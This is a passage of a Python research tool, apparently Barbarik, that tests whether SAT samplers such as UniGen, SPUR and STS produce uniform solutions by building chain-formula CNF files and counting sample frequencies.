Street, Fifth Floor, Boston, MA\n# 02110-1301, USA.\n\nfrom __future__ import print_function\nimport sys\nimport os\nimport math\nimport random\nimport argparse\nimport copy\nimport tempfile\nimport pandas as pd\nimport re\n\nSAMPLER_UNIGEN = 1\nSAMPLER_QUICKSAMPLER = 2\nSAMPLER_STS = 3\nSAMPLER_CMS = 4\nSAMPLER_UNIGEN3 = 5\nSAMPLER_SPUR = 6\nSAMPLER_SMARCH = 7\nSAMPLER_UNIGEN2 = 8\nSAMPLER_KUS = 9\nSAMPLER_DISTAWARE = 10\n\nCURR_REF_SAMPLER = 6 # default is SPUR\n\nP_THREADS = 4\n\n# We need a dictionary for Distribution-aware distance sampling\n# which records names and not feature ids in outputted samples\nfeatures_dict = {}\n\n\ndef create_features_dict(inputFile):\n nb_vars = 0\n with open(inputFile, 'r') as f:\n lines = f.readlines()\n for line in lines:\n if line.startswith(\"c\") and not line.startswith(\"c ind\"):\n line = line[0:len(line) - 1]\n _feature = line.split(\" \", 4)\n del _feature[0]\n # handling non-numeric feature IDs, necessary to parse os-like models with $ in feature names...\n if len(_feature) <= 2 and len(_feature) > 0: # needs to deal with literate comments, e.g., in V15 models\n if (_feature[0].isdigit()):\n _feature[0] = int(_feature[0])\n else:\n # num_filter = filter(_feature[0].isdigit(), _feature[0])\n num_feature = \"\".join(c for c in _feature[0] if c.isdigit())\n _feature[0] = int(num_feature)\n # print('key ' + str(_feature[1]) + ' value ' + str(_feature[0])) -- debug\n global features_dict\n features_dict.update({str(_feature[1]): str(_feature[0])})\n elif line.startswith('p cnf'):\n _line = line.split(\" \", 4)\n nb_vars = int(_line[2])\n print(\"there are : \" + str(nb_vars) + \" integer variables\")\n if (len(features_dict.keys()) == 0):\n print(\"could not create dict from comments, faking it with integer variables in the 'p cnf' header\")\n for i in range(1, nb_vars + 1):\n # global features_dict\n features_dict.update({str(i): str(i)})\n\n\ndef get_sampler_string(samplerType):\n if samplerType == SAMPLER_UNIGEN:\n return 'UniGen'\n if samplerType == SAMPLER_UNIGEN3:\n return 'UniGen3'\n if samplerType == SAMPLER_QUICKSAMPLER:\n return 'QuickSampler'\n if samplerType == SAMPLER_STS:\n return 'STS'\n if samplerType == SAMPLER_CMS:\n return 'CustomSampler'\n if samplerType == SAMPLER_SPUR:\n return 'SPUR'\n if samplerType == SAMPLER_SMARCH:\n return 'SMARCH'\n if samplerType == SAMPLER_UNIGEN2:\n return 'UNIGEN2'\n if samplerType == SAMPLER_KUS:\n return 'KUS'\n if samplerType == SAMPLER_DISTAWARE:\n return 'DistanceBasedSampling'\n print(\"ERROR: unknown sampler type\")\n exit(-1)\n\n\nclass ChainFormulaSetup:\n def __init__(self, countList, newVarList, indicatorLits):\n self.countList = countList\n self.newVarList = newVarList\n self.indicatorLits = indicatorLits\n\n\ndef check_cnf(fname):\n with open(fname, 'r') as f:\n lines = f.readlines()\n\n given_vars = None\n given_cls = None\n cls = 0\n max_var = 0\n for line in lines:\n line = line.strip()\n\n if len(line) == 0:\n print(\"ERROR: CNF is incorrectly formatted, empty line!\")\n return False\n\n line = line.split()\n line = [l.strip() for l in line]\n\n if line[0] == \"p\":\n assert len(line) == 4\n assert line[1] == \"cnf\"\n given_vars = int(line[2])\n given_cls = int(line[3])\n continue\n\n if line[0] == \"c\":\n continue\n\n cls += 1\n for l in line:\n var = abs(int(l))\n max_var = max(var, max_var)\n\n if max_var > given_vars:\n print(\"ERROR: Number of variables given is LESS than the number of variables ued\")\n print(\"ERROR: Vars in header: %d max var: %d\" % (given_vars, max_var))\n return False\n\n if cls != given_cls:\n print(\"ERROR: Number of clauses in header is DIFFERENT than the number of clauses in the CNF\")\n print(\"ERROR: Claues in header: %d clauses: %d\" % (given_cls, cls))\n return False\n\n return True\n\n\nclass SolutionRetriver:\n\n @staticmethod\n def getSolutionFromSampler(inputFile, numSolutions, samplerType, indVarList, newSeed):\n topass_withseed = (inputFile, numSolutions, indVarList, newSeed)\n ok = check_cnf(inputFile)\n if not ok:\n print(\"ERROR: CNF is malformatted. Sampler may give wrong solutions in this case. Exiting.\")\n print(\"File is: %s\" % inputFile)\n exit(-1)\n\n print(\"Using sampler: %s\" % get_sampler_string(samplerType))\n if (samplerType == SAMPLER_UNIGEN):\n sols = SolutionRetriver.getSolutionFromUniGen(*topass_withseed)\n\n elif (samplerType == SAMPLER_UNIGEN3):\n sols = SolutionRetriver.getSolutionFromUniGen3(*topass_withseed)\n\n elif (samplerType == SAMPLER_QUICKSAMPLER):\n sols = SolutionRetriver.getSolutionFromQuickSampler(*topass_withseed)\n\n elif (samplerType == SAMPLER_STS):\n sols = SolutionRetriver.getSolutionFromSTS(*topass_withseed)\n\n elif (samplerType == SAMPLER_CMS):\n sols = SolutionRetriver.getSolutionFromCMSsampler(*topass_withseed)\n\n elif (samplerType == SAMPLER_SPUR):\n sols = SolutionRetriver.getSolutionFromSpur(*topass_withseed)\n\n elif (samplerType == SAMPLER_SMARCH):\n sols = SolutionRetriver.getSolutionFromSMARCH(*topass_withseed)\n\n elif (samplerType == SAMPLER_UNIGEN2):\n sols = SolutionRetriver.getSolutionFromUniGen2(*topass_withseed)\n\n elif (samplerType == SAMPLER_KUS):\n sols = SolutionRetriver.getSolutionFromKUS(*topass_withseed)\n\n elif (samplerType == SAMPLER_DISTAWARE):\n sols = SolutionRetriver.getSolutionFromDistAware(*topass_withseed)\n\n else:\n print(\"Error: No such sampler!\")\n exit(-1)\n\n # clean up the solutions\n for i in range(len(sols)):\n sols[i] = sols[i].strip()\n if sols[i].endswith(' 0'):\n sols[i] = sols[i][:-2]\n\n print(\"Number of solutions returned by sampler:\", len(sols))\n # if args.verbose:\n # print(\"Solutions:\", sols)\n return sols\n\n @staticmethod\n def getSolutionFromUniGen(inputFile, numSolutions, indVarList, newSeed):\n # must construct ./unigen --samples=500 --verbosity=0 --threads=1 CNF-FILE SAMPLESFILE\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n tempOutputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".txt\"\n\n cmd = './samplers/unigen --samples=' + str(numSolutions)\n cmd += ' ' + inputFile + ' ' + str(tempOutputFile) + ' > /dev/null 2>&1'\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n\n with open(tempOutputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n for line in lines:\n line = line.strip()\n if line.startswith('v'):\n freq = int(line.split(':')[-1])\n for i in range(freq):\n solList.append(line.split(':')[0].replace('v', '').strip())\n if (len(solList) == numSolutions):\n break\n if (len(solList) == numSolutions):\n break\n solreturnList = solList\n if (len(solList) > numSolutions):\n solreturnList = random.sample(solList, numSolutions)\n\n os.unlink(str(tempOutputFile))\n return solreturnList\n\n @staticmethod\n def getSolutionFromUniGen2(inputFile, numSolutions, indVarList, newSeed):\n\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n tempOutputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".txt\"\n cwd = os.getcwd()\n cmd = 'python3 UniGen2.py -samples=' + str(numSolutions)\n cmd += ' ' + str(os.path.abspath(inputFile)) + ' ' + str(tempfile.gettempdir()) + ' > /dev/null 2>&1'\n if args.verbose:\n print(\"cmd: \", cmd)\n os.chdir(str(os.getcwd()) + '/samplers')\n os.system(cmd)\n os.chdir(str(cwd))\n\n with open(tempOutputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n for line in lines:\n line = line.strip()\n if line.startswith('v'):\n freq = int(line.split(':')[-1])\n for i in range(freq):\n solList.append(line.split(':')[0].replace('v', '').strip())\n if (len(solList) == numSolutions):\n break\n if (len(solList) == numSolutions):\n break\n solreturnList = solList\n if (len(solList) > numSolutions):\n solreturnList = random.sample(solList, numSolutions)\n\n os.unlink(str(tempOutputFile))\n return solreturnList\n\n @staticmethod\n def getSolutionFromKUS(inputFile, numSolutions, indVarList, newSeed):\n\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n tempOutputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".txt\"\n cwd = os.getcwd()\n cmd = 'python3 KUS.py --samples=' + str(numSolutions) + ' ' + '--outputfile ' + tempOutputFile\n cmd += ' ' + str(os.path.abspath(inputFile)) + ' > /dev/null 2>&1'\n if args.verbose:\n print(\"cmd: \", cmd)\n os.chdir(str(os.getcwd()) + '/samplers')\n os.system(cmd)\n os.chdir(str(cwd))\n\n with open(tempOutputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n\n for line in lines:\n sol = re.sub('[0-9]*,', '', line)\n solList.append(sol)\n\n os.unlink(str(tempOutputFile))\n\n return solList\n\n @staticmethod\n def getSolutionFromUniGen3(inputFile, numSolutions, indVarList, newSeed):\n # must construct: ./approxmc3 -s 1 -v2 --sampleout /dev/null --samples 500\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n tempOutputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".txt\"\n\n cmd = './samplers/approxmc3 -s ' + str(int(newSeed)) + ' -v 0 --samples ' + str(numSolutions)\n cmd += ' --sampleout ' + str(tempOutputFile)\n cmd += ' ' + inputFile + ' > /dev/null 2>&1'\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n\n with open(tempOutputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n for line in lines:\n line = line.strip()\n freq = int(line.split(':')[0])\n for i in range(freq):\n solList.append(line.split(':')[1].strip())\n if len(solList) == numSolutions:\n break\n if len(solList) == numSolutions:\n break\n\n solreturnList = solList\n if len(solList) > numSolutions:\n solreturnList = random.sample(solList, numSolutions)\n\n os.unlink(str(tempOutputFile))\n return solreturnList\n\n @staticmethod\n def getSolutionFromDistAware(inputFile, numSolutions, indVarList, newSeed):\n\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n tempOutputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".txt\"\n\n # creating the file to configure the sampler\n dbsConfigFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".a\"\n\n with open(dbsConfigFile, 'w+') as f:\n f.write(\"log \" + tempfile.gettempdir() + '/' + \"output.txt\" + \"\\n\")\n f.write(\"dimacs \" + str(os.path.abspath(inputFile)) + \"\\n\")\n params = \" solver z3\" + \"\\n\"\n params += \"hybrid distribution-aware distance-metric:manhattan distribution:uniform onlyBinary:true onlyNumeric:false\"\n params += \" selection:SolverSelection number-weight-optimization:1\"\n params += \" numConfigs:\" + str(numSolutions)\n f.write(params + \"\\n\")\n f.write(\"printconfigs \" + tempOutputFile)\n\n cmd = \"mono ./samplers/distribution-aware/CommandLine.exe \"\n cmd += dbsConfigFile\n\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n\n with open(tempOutputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n\n for line in lines:\n features = re.findall(\"%\\w+%\", line)\n sol = []\n\n for feature in features:\n feat = feature[1:-1]\n sol.append(feat)\n\n solution = ''\n\n for k, v in features_dict.items():\n if k in sol:\n solution += ' ' + str(v)\n else:\n solution += ' -' + str(v)\n solList.append(solution)\n\n # cleaning temporary files\n os.unlink(str(tempOutputFile))\n os.unlink(dbsConfigFile)\n os.unlink(str(tempfile.gettempdir()) + '/' + \"output.txt\")\n os.unlink(str(tempfile.gettempdir()) + '/' + \"output.txt_error\")\n\n return solList\n\n @staticmethod\n def getSolutionFromQuickSampler(inputFile, numSolutions, indVarList, newSeed):\n cmd = \"./samplers/quicksampler -n \" + str(numSolutions * 5) + ' ' + str(inputFile) + ' > /dev/null 2>&1'\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n cmd = \"./samplers/z3-quicksampler/z3 sat.quicksampler_check=true sat.quicksampler_check.timeout=3600.0 \" + str(\n inputFile) + ' > /dev/null 2>&1'\n # os.system(cmd)\n\n # cmd = \"./samplers/z3 \"+str(inputFile)#+' > /dev/null 2>&1'\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n if (numSolutions > 1):\n i = 0\n\n with open(inputFile + '.samples', 'r') as f:\n lines = f.readlines()\n\n with open(inputFile + '.samples.valid', 'r') as f:\n validLines = f.readlines()\n\n solList = []\n for j in range(len(lines)):\n if (validLines[j].strip() == '0'):\n continue\n fields = lines[j].strip().split(':')\n sol = ''\n i = 0\n # valutions are 0 and 1 and in the same order as c ind.\n for x in list(fields[1].strip()):\n if (x == '0'):\n sol += ' -' + str(indVarList[i])\n else:\n sol += ' ' + str(indVarList[i])\n i += 1\n solList.append(sol)\n if (len(solList) == numSolutions):\n break\n\n os.unlink(inputFile + '.samples')\n os.unlink(inputFile + '.samples.valid')\n\n if len(solList) != numSolutions:\n print(\"Did not find required number of solutions\")\n sys.exit(1)\n\n return solList\n\n @staticmethod\n def getSolutionFromSpur(inputFile, numSolutions, indVarList, newSeed):\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n tempOutputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".out\"\n cmd = './samplers/spur -seed %d -q -s %d -out %s -cnf %s' % (\n newSeed, numSolutions, tempOutputFile, inputFile)\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n\n with open(tempOutputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n startParse = False\n for line in lines:\n if (line.startswith('#START_SAMPLES')):\n startParse = True\n continue\n if (not (startParse)):\n continue\n if (line.startswith('#END_SAMPLES')):\n startParse = False\n continue\n fields = line.strip().split(',')\n solCount = int(fields[0])\n sol = ' '\n i = 1\n for x in list(fields[1]):\n if (x == '0'):\n sol += ' -' + str(i)\n else:\n sol += ' ' + str(i)\n i += 1\n for i in range(solCount):\n solList.append(sol)\n\n os.unlink(tempOutputFile)\n return solList\n\n @staticmethod\n def getSolutionFromSTS(inputFile, numSolutions, indVarList, newSeed):\n kValue = 50\n samplingRounds = numSolutions / kValue + 1\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n outputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".out\"\n cmd = './samplers/STS -k=' + str(kValue) + ' -nsamples=' + str(samplingRounds) + ' ' + str(inputFile)\n cmd += ' > ' + str(outputFile)\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n\n with open(outputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n shouldStart = False\n # baseList = {}\n for j in range(len(lines)):\n if (lines[j].strip() == 'Outputting samples:' or lines[j].strip() == 'start'):\n shouldStart = True\n continue\n if (lines[j].strip().startswith('Log') or lines[j].strip() == 'end'):\n shouldStart = False\n if (shouldStart):\n\n '''if lines[j].strip() not in baseList:\n baseList[lines[j].strip()] = 1\n else:\n baseList[lines[j].strip()] += 1'''\n sol = ''\n i = 0\n # valutions are 0 and 1 and in the same order as c ind.\n for x in list(lines[j].strip()):\n if (x == '0'):\n sol += ' -' + str(indVarList[i])\n else:\n sol += ' ' + str(indVarList[i])\n i += 1\n solList.append(sol)\n if len(solList) == numSolutions:\n break\n\n if len(solList) != numSolutions:\n print(len(solList))\n print(\"STS Did not find required number of solutions\")\n sys.exit(1)\n\n os.unlink(outputFile)\n return solList\n\n @staticmethod\n def getSolutionFromCMSsampler(inputFile, numSolutions, indVarList, newSeed):\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n outputFile = tempfile.gettempdir() + '/' + inputFileSuffix + \".out\"\n cmd = \"./samplers/cryptominisat5 --restart luby --maple 0 --verb 10 --nobansol\"\n cmd += \" --scc 1 -n1 --presimp 0 --polar rnd --freq 0.9999\"\n cmd += \" --random \" + str(int(newSeed)) + \" --maxsol \" + str(numSolutions)\n cmd += \" \" + inputFile\n cmd += \" --dumpresult \" + outputFile + \" > /dev/null 2>&1\"\n\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n\n with open(outputFile, 'r') as f:\n lines = f.readlines()\n\n solList = []\n for line in lines:\n if line.strip() == 'SAT':\n continue\n\n sol = \"\"\n lits = line.split(\" \")\n for y in indVarList:\n if str(y) in lits:\n sol += ' ' + str(y)\n\n if \"-\" + str(y) in lits:\n sol += ' -' + str(y)\n solList.append(sol)\n\n solreturnList = solList\n if len(solList) > numSolutions:\n solreturnList = random.sample(solList, numSolutions)\n if len(solList) < numSolutions:\n print(\"cryptominisat5 Did not find required number of solutions\")\n sys.exit(1)\n os.unlink(outputFile)\n return solreturnList\n\n @staticmethod\n def getSolutionFromSMARCH(inputFile, numSolutions, indVarList, newSeed):\n cmd = \"python3 ./samplers/smarch_mp.py -p \" + str(P_THREADS) + \" -o \" + os.path.dirname(\n inputFile) + \" \" + inputFile + \" \" + str(numSolutions) + \" > /dev/null 2>&1\"\n # cmd = \"python3 /home/gilles/ICST2019-EMSE-Ext/Kclause_Smarch-local/Smarch/smarch.py \" + \" -o \" + os.path.dirname(inputFile) + \" \" + inputFile + \" \" + str(numSolutions)\n if args.verbose:\n print(\"cmd: \", cmd)\n os.system(cmd)\n # if (numSolutions > 1):\n # i = 0\n solList = []\n tempFile = inputFile.replace('.cnf', '_' + str(numSolutions)) + '.samples'\n if args.verbose:\n print(tempFile)\n\n df = pd.read_csv(tempFile, header=None)\n\n # with open(inputFile+'.samples', 'r') as f:\n # lines = f.readlines()\n for x in df.values:\n # tmpLst = []\n lst = x.tolist()\n sol = ''\n for i in lst:\n if not math.isnan(i):\n sol += ' ' + str(int(i))\n # tmpList = [str(int(i)) for i in lst if not math.isnan(i)]\n # if args.verbose:\n # print(sol)\n\n # solList.append(tmpList)\n # solList = [x for x in df.values]\n os.unlink(tempFile)\n solList.append(sol)\n\n return solList\n\n\n# returns List of Independent Variables\ndef parseIndSupport(indSupportFile):\n with open(indSupportFile, 'r') as f:\n lines = f.readlines()\n\n indList = []\n numVars = 0\n for line in lines:\n if line.startswith('p cnf'):\n fields = line.split()\n numVars = int(fields[2])\n\n if line.startswith('c ind'):\n line = line.strip().replace('c ind', '').replace(' 0', '').strip().replace('v ', '')\n indList.extend(line.split())\n\n if len(indList) == 0:\n indList = [int(x) for x in range(1, numVars + 1)]\n else:\n indList = [int(x) for x in indList]\n return indList\n\n\ndef chainFormulaSetup(sampleSol, unifSol, numSolutions):\n # number of solutions for each: k1, k2, k3\n # TODO rename to chainSolutions\n countList = [5, 5, 5]\n\n # chain formula number of variables for each\n # TODO rename to chainVars\n newVarList = [4, 4, 4]\n\n ##########\n # clean up the solutions\n ##########\n sampleSol = sampleSol[0].strip()\n if sampleSol.endswith(' 0'):\n sampleSol = sampleSol[:-2]\n unifSol = unifSol[0].strip()\n if unifSol.endswith(' 0'):\n unifSol = unifSol[:-2]\n\n # adding more chain formulas (at most 8 in total: 3 + 5)\n # these chain formulas will have 31 solutions over 6 variables\n lenSol = len(sampleSol.split())\n for i in range(min(int(math.log(numSolutions, 2)) + 4, lenSol - 3, 5)):\n countList.append(31)\n newVarList.append(6)\n assert len(countList) == len(newVarList)\n\n # picking selector literals, i.e. k1, k2, k3, randomly\n if args.verbose:\n print(\"len count list: \" + str(len(countList)))\n print(\"#num of samples\" + str(len(sampleSol.split())))\n\n assert len(sampleSol.split()) > len(countList), \"There are not enough samples to proceed, sampler failed ?\"\n sampleLitList = random.sample(sampleSol.split(), len(countList))\n unifLitList = []\n unifSolMap = unifSol.split()\n\n # from the last version of barbarik...\n if CURR_REF_SAMPLER == SAMPLER_SPUR:\n for lit in sampleLitList:\n unifLitList.append(unifSolMap[abs(int(lit)) - 1])\n else:\n # since the reference is not always spur, some adapations are required here\n for lit in sampleLitList:\n if lit in unifSolMap:\n unifLitList.append(lit)\n elif int(lit) > 0 and str('-' + lit) in unifSolMap:\n unifLitList.append(str('-' + lit))\n elif int(lit) < 0 and str(abs(int(lit))) in unifSolMap:\n unifLitList.append(str(abs(int(lit))))\n else:\n print(\"ERROR in Sampling ! \")\n # print(\"appending: \" + unifSolMap[abs(int(lit))-1]+ \" for \"+ lit)\n # unifLitList.append(unifSolMap[abs(int(lit))-1])\n\n assert len(unifLitList) == len(sampleLitList)\n # print(unifLitList)\n # print(sampleLitList)\n\n for a, b in zip(unifLitList, sampleLitList):\n assert abs(int(a)) == abs(int(b))\n\n indicatorLits = []\n indicatorLits.append(sampleLitList)\n indicatorLits.append(unifLitList)\n\n # print(\"countList:\", countList)\n # print(\"newVarList:\", newVarList)\n # print(\"indicatorLits:\", indicatorLits)\n return ChainFormulaSetup(countList, newVarList, indicatorLits)\n\n\ndef pushVar(variable, cnfClauses):\n cnfLen = len(cnfClauses)\n for i in range(cnfLen):\n cnfClauses[i].append(variable)\n return cnfClauses\n\n\ndef getCNF(variable, binStr, sign, origTotalVars):\n cnfClauses = []\n binLen = len(binStr)\n if sign is False:\n cnfClauses.append([-(binLen + 1 + origTotalVars)])\n else:\n cnfClauses.append([binLen + 1 + origTotalVars])\n\n for i in range(binLen):\n newVar = int(binLen - i + origTotalVars)\n if sign is False:\n newVar = -1 * (binLen - i + origTotalVars)\n\n if (binStr[binLen - i - 1] == '0'):\n cnfClauses.append([newVar])\n else:\n cnfClauses = pushVar(newVar, cnfClauses)\n pushVar(variable, cnfClauses)\n return cnfClauses\n\n\ndef constructChainFormula(originalVar, solCount, newVar, origTotalVars, invert):\n assert type(solCount) == int\n\n binStr = str(bin(int(solCount)))[2:-1]\n binLen = len(binStr)\n for _ in range(newVar - binLen - 1):\n binStr = '0' + binStr\n\n firstCNFClauses = getCNF(-int(originalVar), binStr, invert, origTotalVars)\n addedClauseNum = 0\n writeLines = ''\n for cl in firstCNFClauses:\n addedClauseNum += 1\n for lit in cl:\n writeLines += \"%d \" % lit\n writeLines += '0\\n'\n\n return writeLines, addedClauseNum\n\n\n# returns whether new file was created and the list of TMP+OLD independent variables\ndef constructNewCNF(inputFile, tempFile, sampleSol, unifSol, chainFormulaConf, indVarList):\n # which variables are in pos/neg value in the sample\n sampleVal = {}\n for i in sampleSol.strip().split():\n i = int(i)\n if i != 0:\n if abs(i) not in indVarList:\n continue\n\n sampleVal[abs(i)] = int(i / abs(i))\n\n # which variables are in pos/neg value in the uniform sample\n unifVal = {}\n diffIndex = -1\n for j in unifSol.strip().split():\n j = int(j)\n if j != 0:\n if abs(j) not in indVarList:\n continue\n\n unifVal[abs(j)] = int(j / abs(j))\n\n if sampleVal[abs(j)] != unifVal[abs(j)]:\n diffIndex = abs(j)\n\n # the two solutions are the same\n # can't do anything, let's do another experiment\n if diffIndex == -1:\n return False, None, None\n\n with open(inputFile, 'r') as f:\n lines = f.readlines()\n\n # variables must be shifted by sumNewVar\n sumNewVar = sum(chainFormulaConf.newVarList)\n\n # emit the original CNF, but with shifted variables\n shiftedCNFStr = ''\n for line in lines:\n line = line.strip()\n if line.startswith('p cnf'):\n numVar = int(line.split()[2])\n numCls = int(line.split()[3])\n continue\n\n if line.startswith('c'):\n # comment\n continue\n\n for x in line.split():\n x = int(x)\n if x == 0:\n continue\n sign = int(x / abs(x))\n shiftedCNFStr += \"%d \" % (sign * (abs(x) + sumNewVar))\n shiftedCNFStr += ' 0\\n'\n del i\n\n # Fixing the solution based on splittingVar\n # X = sigma1 OR X = singma2\n # All variables are set except for the index where they last differ\n solClause = ''\n splittingVar = diffIndex + sumNewVar\n for var in indVarList:\n if var != diffIndex:\n numCls += 2\n solClause += \"%d \" % (-splittingVar * sampleVal[diffIndex])\n solClause += \"%d 0\\n\" % (sampleVal[var] * (var + sumNewVar))\n\n solClause += \"%d \" % (-splittingVar * unifVal[diffIndex])\n solClause += \"%d 0\\n\" % (unifVal[var] * (var + sumNewVar))\n\n ##########\n # We add the N number of chain formulas\n # where chainFormulaConf.indicatorLits must be of size 2\n # and len(chainFormulaConf.indicatorLits) == len(chainFormulaConf.newVarList)\n # Adding K soluitons over Z variables, where\n # Z = chainFormulaConf.newVarList[k]\n # K = chainFormulaConf.countList[k]\n ##########\n invert = True\n seenLits = {}\n for indicLits in chainFormulaConf.indicatorLits: # loop runs twice\n currentNumVar = 0\n for i in range(len(indicLits)):\n newvar = chainFormulaConf.newVarList[i]\n indicLit = int(indicLits[i])\n addedClause = ''\n addedClauseNum = 0\n\n # not adding the chain formula twice to the same literal\n if indicLit not in seenLits:\n sign = int(indicLit / abs(indicLit))\n addedClause, addedClauseNum = constructChainFormula(\n sign * (abs(indicLit) + sumNewVar),\n chainFormulaConf.countList[i], newvar, currentNumVar,\n invert)\n\n seenLits[indicLit] = True\n currentNumVar += newvar\n numCls += addedClauseNum\n solClause += addedClause\n invert = not invert\n del seenLits\n del invert\n\n # create \"c ind ...\" lines\n oldIndVarList = [x + sumNewVar for x in indVarList]\n tempIndVarList = copy.copy(oldIndVarList)\n indIter = 1\n indStr = 'c ind '\n for i in range(1, currentNumVar + 1):\n if indIter % 10 == 0:\n indStr += ' 0\\nc ind '\n indStr += \"%d \" % i\n indIter += 1\n tempIndVarList.append(i)\n\n for i in oldIndVarList:\n if indIter % 10 == 0:\n indStr += ' 0\\nc ind '\n indStr += \"%d \" % i\n indIter += 1\n indStr += ' 0\\n'\n\n # dump new CNF\n with open(tempFile, 'w') as f:\n f.write('p cnf %d %d\\n' % (currentNumVar + numVar, numCls))\n f.write(indStr)\n f.write(solClause)\n # f.write(\"c -- old CNF below -- \\n\")\n f.write(shiftedCNFStr)\n\n # print(\"New file: \", tempFile)\n # exit(0)\n\n return True, tempIndVarList, oldIndVarList\n\n\nclass Experiment:\n def __init__(self, inputFile, maxSamples, minSamples, samplerType, refSamplerType):\n inputFileSuffix = inputFile.split('/')[-1][:-4]\n self.tempFile = tempfile.gettempdir() + \"/\" + inputFileSuffix + \"_t.cnf\"\n self.indVarList = parseIndSupport(inputFile)\n self.inputFile = inputFile\n self.samplerType = samplerType\n self.maxSamples = maxSamples\n self.minSamples = minSamples\n\n self.samplerString = get_sampler_string(samplerType)\n self.ref_sampler_type = refSamplerType\n\n # Returns True if uniform and False otherwise\n def testUniformity(self, solList, indVarList):\n solMap = {}\n baseMap = {}\n for sol in solList:\n solution = ''\n solFields = sol.split()\n for entry in solFields:\n if abs(int(entry)) in indVarList:\n solution += entry + ' '\n\n if solution in solMap.keys():\n solMap[solution] += 1\n else:\n solMap[solution] = 1\n\n if sol not in baseMap.keys():\n baseMap[sol] = 1\n else:\n baseMap[sol] += 1\n\n if not bool(solMap):\n print(\"No Solutions were given to the test\")\n exit(1)\n\n key = next(iter(solMap))\n\n print(\"baseMap: {:<6} numSolutions: {:<6} SolutionsCount: {:<6} loThresh: {:<6} hiThresh: {:<6}\".format(\n len(baseMap.keys()), self.numSolutions, solMap[key], self.loThresh, self.hiThresh))\n\n if solMap[key] >= self.loThresh and solMap[key] <= self.hiThresh:\n return True\n else:\n return False\n\n def one_experiment(self, experiment, j, i, numExperiments, tj):\n self.thresholdSolutions += self.numSolutions\n if self.thresholdSolutions < self.minSamples:\n return None, None\n\n # generate a new seed value for every different (i,j,experiment)\n newSeed = numExperiments * (i * tj + j) + experiment\n # get sampler's solutions\n sampleSol = SolutionRetriver.getSolutionFromSampler(\n self.inputFile, 1, self.samplerType, self.indVarList, newSeed)\n self.totalSolutionsGenerated += 1\n\n # get uniform sampler's solutions\n # get uniform sampler's solutions\n # unifSol = SolutionRetriver.getSolutionFromSampler(\n # self.inputFile, 1, SAMPLER_SPUR, self.indVarList, newSeed)\n # self.totalUniformSamples += 1\n\n # The reference sampler is a now a parameter of barbarik\n unifSol = SolutionRetriver.getSolutionFromSampler(\n self.inputFile, 1, self.ref_sampler_type, self.indVarList, newSeed)\n self.totalUniformSamples += 1\n\n chainFormulaConf = chainFormulaSetup(sampleSol, unifSol, self.numSolutions)\n shakuniMix, tempIndVarList, oldIndVarList = constructNewCNF(\n self.inputFile, self.tempFile, sampleSol[0], unifSol[0],\n chainFormulaConf, self.indVarList)\n\n # the two solutions were the same, couldn't construct CNF\n if not shakuniMix:\n return False, None\n\n # seed update\n newSeed = newSeed + 1\n\n # get sampler's solutions\n solList = SolutionRetriver.getSolutionFromSampler(\n self.tempFile, self.numSolutions, self.samplerType, tempIndVarList, newSeed)\n os.unlink(self.tempFile)\n self.totalSolutionsGenerated += self.numSolutions\n\n isUniform = self.testUniformity(solList, oldIndVarList)\n\n print(\"sampler: {:<8s} i: {:<4d} isUniform: {:<4d} TotalSolutionsGenerated: {:<6d}\".format(\n self.samplerString, i, isUniform,\n self.totalSolutionsGenerated))\n\n if not isUniform:\n print(\"exp:{4} RejectIteration:{0} Loop:{1} TotalSolutionsGenerated:{2} TotalUniformSamples:{3}\".format(\n i, j, self.totalSolutionsGenerated, self.totalUniformSamples, experiment))\n\n return True, True\n\n if self.thresholdSolutions > self.maxSamples:\n return True, True\n\n return True, False\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--eta', type=float, help=\"default = 0.9\", default=0.9, dest='eta')\n parser.add_argument('--epsilon', type=float, help=\"default = 0.3\", default=0.3, dest='epsilon')\n parser.add_argument('--delta', type=float, help=\"default = 0.05\", default=0.05, dest='delta')\n parser.add_argument('--sampler', type=int, help=str(SAMPLER_UNIGEN) + \" for UniGen;\\n\" + str(\n SAMPLER_UNIGEN3) + \" for UniGen3 (AppMC3);\\n\" +\n str(SAMPLER_QUICKSAMPLER) + \" for QuickSampler;\\n\" + str(\n SAMPLER_STS) + \" for STS;\\n\" + str(SAMPLER_CMS) + \" for CMS;\\n\" +\n str(SAMPLER_SPUR) + \" for SPUR;\\n\" + str(\n SAMPLER_SMARCH) + \" for SMARCH;\\n\" + str(SAMPLER_UNIGEN2) + \" for UniGen2;\\n\" +\n str(SAMPLER_KUS) + \" for KUS;\\n\" + str(\n SAMPLER_DISTAWARE) + \" for Distance-based Sampling;\\n\", default=SAMPLER_STS, dest='sampler')\n parser.add_argument('--ref-sampler', type=int, help=str(SAMPLER_UNIGEN) + \" for UniGen;\\n\" + str(\n SAMPLER_UNIGEN3) + \" for UniGen3 